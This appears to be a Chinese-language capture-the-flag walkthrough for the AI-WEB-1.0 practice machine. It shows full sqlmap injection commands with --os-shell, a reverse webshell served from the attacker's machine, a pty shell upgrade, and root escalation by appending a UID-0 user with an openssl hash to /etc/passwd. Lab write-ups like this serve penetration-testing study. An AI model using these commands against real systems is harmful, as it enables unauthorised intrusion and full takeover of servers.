AI-WEB-1.0靶机
情报收集
扫描靶机,打开网站提示
Not even Google search my contents!
dirb http://192.168.218.139
扫描网站 进入爬虫协议
User-agent: *
Disallow:
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/
进入两个网站都报错,dirb再次扫描两个网站
打开网站
收集到网站根目录
/home/www/html/web1x443290o2sdf92213
打开另一个
尝试SQL注入,可以
漏洞利用
使用sqlmap进行注入,先bp抓包找到注入点
uid=1&Operation=Submit
python sqlmap.py -u "http://192.168.218.139/se3reTdir777/" --batch --data "uid=1&Operation=Submit" --dbs
--data 用于指定post请求的数据
--batch 默认选项
--dbs 列出所有数据库名
--dump:用于从数据库表中提取数据
--columns:用于列出选定数据库表中的所有列
--tables:用于列出选定数据库中的所有表
--level=3 进行全面测试,包括数据库指纹识别、枚举和数据提取等
--os-shell 尝试获取操作系统 shell
python sqlmap.py -u "http://192.168.218.139/se3reTdir777/" --batch --data "uid=1&Operation=Submit" -D aiweb1 --tables
python sqlmap.py -u "http://192.168.218.139/se3reTdir777/" --batch --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns
没找到有用信息
python sqlmap.py -u "http://192.168.218.139/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell
4
2
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
成功反弹shell
提权
在kali机新建webshell.php文件
IP是kali攻击机的,端口是监听端口
python -m http.server 2222
python搭建简单服务器
靶机下载文件
开启监听
运行文件即可成功反弹
有时候一次不行,多试几次
使用python转换成交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
使用工具openssl功能,对密码加密,写入/etc/pass需要加密形式
openssl passwd -1 -salt web1 123456
-1:表示采用的是MD5加密算法
-salt:指定salt值,不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串
写入密码
echo 'web1:$1$web1$ZrYgDZgZpLlsnVlxUaZwh/:0:0::/root:/bin/bash'>>/etc/passwd
切换用户
su web1
id显示root
攻破